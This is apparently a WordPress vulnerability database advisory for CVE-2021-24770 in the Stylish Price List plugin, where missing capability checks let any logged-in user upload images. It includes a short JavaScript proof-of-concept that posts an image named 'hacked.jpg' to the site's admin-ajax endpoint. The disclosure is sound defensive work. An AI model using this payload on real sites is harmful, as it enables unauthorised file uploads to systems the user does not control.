Stylish Price List < 6.9.1 – Subscriber+ Arbitrary Image Upload | CVE 2021-24770 | Plugin Vulnerabilities

Description

The plugin does not perform capability checks in its spl_upload_ser_img AJAX action (available to authenticated users), which could allow any authenticated users, such as subscriber, to upload arbitrary images.

Proof of Concept

fetch("https://upload.wikimedia.org/wikipedia/commons/e/e8/DID_U_ASK_4_MOAR_KINDESS_ON_WIKIPEDIA.jpg").then(r=>r.blob()).then(b=>{const p = new FormData();
p.set("action","spl_upload_ser_img");
p.set("file",new File([b],"hacked.jpg",{type:"image/jpeg"}));
fetch("https://example.com/wp-admin/admin-ajax.php",{method:"POST",body:p});
})

The uploaded file will be at https://example.com/wp-content/uploads/2021/09/hacked.jpg

Affects Plugins

stylish-price-list

Fixed in 6.9.1

References

CVE

Classification

Type

INCORRECT AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

4365c813-4bd7-4c7c-a15b-ef9a42d32b26

Timeline

Publicly Published

2021-09-29 (about 4 years ago)

Added

2021-09-29 (about 4 years ago)

Last Updated

2022-04-08 (about 3 years ago)

Other

Published

Title

Published

2025-09-11

Title

Recipe Card Blocks for Gutenberg & Elementor < 3.4.9 - Incorrect Authorization

Published

2022-11-21

Title

AntiHacker < 4.20 - Subscriber+ Arbitrary Plugin Installation

Published

2023-03-10

Title

GiveWP < 2.25.2 - Contributor+ Arbitrary Content Deletion

Published

2023-11-16

Title

Jetpack < 12.7 - Improper Authorization via WPCom External Media REST endpoints

Published

2022-02-17

Title

UpdraftPlus Free < 1.22.3 & Premium < 2.22.3 - Subscriber+ Backup Download